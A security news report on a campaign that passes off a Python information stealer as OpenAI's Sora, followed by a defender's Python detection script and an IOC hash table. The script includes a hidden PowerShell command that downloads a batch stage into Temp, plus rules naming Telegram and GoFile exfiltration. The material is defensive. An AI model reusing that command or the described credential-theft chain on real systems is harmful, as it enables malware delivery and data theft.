Attackers have seized on the global fascination with OpenAI’s Sora, a cutting-edge video generation model, by distributing potent information-stealing malware under its guise.
This campaign exploits both the popularity of Sora and the credibility of open-source platforms like Github to propagate malware, thereby widening its potential victim pool.
Attack Chain Leverages Social Engineering
The attack begins with a malicious Windows shortcut file, “SoraAI.lnk,” which is crafted to mimic legitimate AI software.

Unsuspecting users, tricked via social engineering, execute this file, unknowingly initiating a sophisticated multi-stage infection process.
Unlike typical malware distribution that relies on shady download sites, this campaign leverages Github repositories, a trusted platform within the developer community, by hosting malicious payloads named after legitimate AI tools.
Upon execution, “SoraAI.lnk” triggers a series of scripts that utilize Windows command line and PowerShell to download additional payloads from a Github repository.

The malware chain commences by fetching a batch script (“a.bat”) into the victim’s temporary directory.
According to the K7 Security Labs report, this script persistently attempts to download a zipped archive containing further malicious components, extracting and executing each stage in a highly automated sequence.
The batch scripts are designed to suppress visible output and clean up after themselves, minimizing forensic traces and user suspicion.
Information-Stealing Malware
Subsequent stages deploy additional scripts (“f.bat” and “1.bat”) that repeat the download-extract-execute cycle, each time fetching new components, until the attacker’s Python-based information stealer is fully deployed.
The Python stealer harnesses legitimate libraries such as requests, websocket-client, pywin32, aiohttp, and cryptography to enhance HTTP communications, system integration, and encrypted data handling.
Critically, the stealer establishes persistence by creating autorun entries in system startup folders, ensuring that the infection survives reboots.
The malicious Python script systematically targets sensitive user data by scanning for browser profiles, extracting cookies, saved passwords, and autofill entries from Chrome, Firefox, and Opera browsers.
It also exports wifi credentials, cryptocurrency wallet data, and gaming launcher configurations, potentially compromising both personal and financial assets.
Notably, the malware employs advanced tactics such as process enumeration, memory scraping, and the use of a custom Chrome decryption DLL to bypass browser security measures.
All harvested data is compressed into zip archives, labeled with victim-specific identifiers such as IP address and country, and exfiltrated via Telegram bot APIs, an increasingly popular tactic for bypassing traditional network defenses.
For larger data sets exceeding 49 MB, files are covertly uploaded to external hosting services like GoFile.io, further complicating detection and response efforts.
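Detection logic a defender could run over endpoint telemetry to spot the stage pattern described above (shell-driven GitHub download into the temp directory, batch stages launched from there, Startup-folder persistence, and outbound connections to Telegram or GoFile). This is an added example, not code from the report or from K7 Security Labs; the event schema, host names, file paths and the placeholder repository URL are constructed assumptions.

```python
import re
from collections import defaultdict

TEMP = r"(?:%temp%|\\temp\\)"  # matches %TEMP% or a ...\Temp\ path component

# (rule name, event kind, regex over the event text). One rule per stage of the chain
# described in the report; a single rule on its own is too noisy to alert on.
RULES = [
    ("shell_github_download_to_temp", "process",
     re.compile(r"(?:powershell|cmd)\.exe\|.*github.*" + TEMP, re.I)),
    ("batch_stage_from_temp", "process",
     re.compile(r"cmd\.exe\|[^|]*" + TEMP + r'[^|\s"]*\.bat', re.I)),
    ("startup_folder_persistence", "file",
     re.compile(r"\\start menu\\programs\\startup\\", re.I)),
    ("exfil_channel", "network",
     re.compile(r"(?:^|\.)(?:api\.telegram\.org|gofile\.io)$", re.I)),
]

# Constructed sample telemetry (Sysmon-like events flattened to dicts; field names are
# an assumption). WS-01 shows the full chain, WS-02 is a developer box doing a normal
# git clone and running a Telegram client.
EVENTS = [
    {"host": "WS-01", "kind": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER-REPO/a.bat -OutFile C:\Users\u\AppData\Local\Temp\a.bat"'},
    {"host": "WS-01", "kind": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\a.bat"'},
    {"host": "WS-01", "kind": "file",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat"},
    {"host": "WS-01", "kind": "network", "dest": "api.telegram.org"},
    {"host": "WS-02", "kind": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell git clone https://github.com/org/tool C:\dev\tool"},
    {"host": "WS-02", "kind": "network", "dest": "api.telegram.org"},
]

def event_text(e):
    """Flatten an event into the string the rule regexes are written against."""
    if e["kind"] == "process":
        return f'{e["image"]}|{e["cmdline"]}'
    return e.get("path") or e.get("dest", "")

def score_hosts(events):
    """Return {host: sorted list of distinct rule names observed on that host}."""
    hits = defaultdict(set)
    for e in events:
        for name, kind, rx in RULES:
            if e["kind"] == kind and rx.search(event_text(e)):
                hits[e["host"]].add(name)
    return {h: sorted(r) for h, r in hits.items()}

def alert_hosts(events, min_rules=3):
    """Alert only where several distinct stages of the chain appear on one host."""
    return sorted(h for h, r in score_hosts(events).items() if len(r) >= min_rules)

if __name__ == "__main__":
    print(score_hosts(EVENTS))
    print("alert:", alert_hosts(EVENTS))
```

Correlating stages per host rather than alerting on any single match keeps a developer's ordinary GitHub clone or Telegram traffic from paging anyone, while a host that downloads to the temp directory, runs batch stages from it, persists in the Startup folder and then talks to an exfiltration service still trips the rule.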
This multi-stage, persistent threat exemplifies how cybercriminals efficiently combine social engineering, open-source infrastructure abuse, and modular stealer toolkits to maximize both infection rates and data theft.
First identified in Vietnam in May 2025, the campaign has rapidly expanded to other regions. The true scope of affected users remains unknown.
Security researchers urge users to download software exclusively from official, verified sources; scrutinize executable files before launching them; and maintain robust, updated endpoint protections.
As attacks increasingly exploit the blurred lines between legitimate AI innovation and cybercrime, heightened vigilance and layered defenses are essential.
Indicators of Compromise (IOC)
| File Name | Hash |
|---|---|
| SoraAI.lnk | D4B1F86B0D722935BDA299D37F7A2663 |
| a.bat | 8358AF316ACDFD449D9E9F78FFC57500 |
| f.bat | 596C75805BE5AD3B44A0AAFA9E94DFC2 |
| 1.bat | BE13272715927422332A14DBFE32CFF7 |
| python.py | 9BABDE0DD32C1AB24EFB2C4D25BD0B10 |
| chrome_decrypt.dll | ED38E7C7E54B87841BDB013203EBF01B |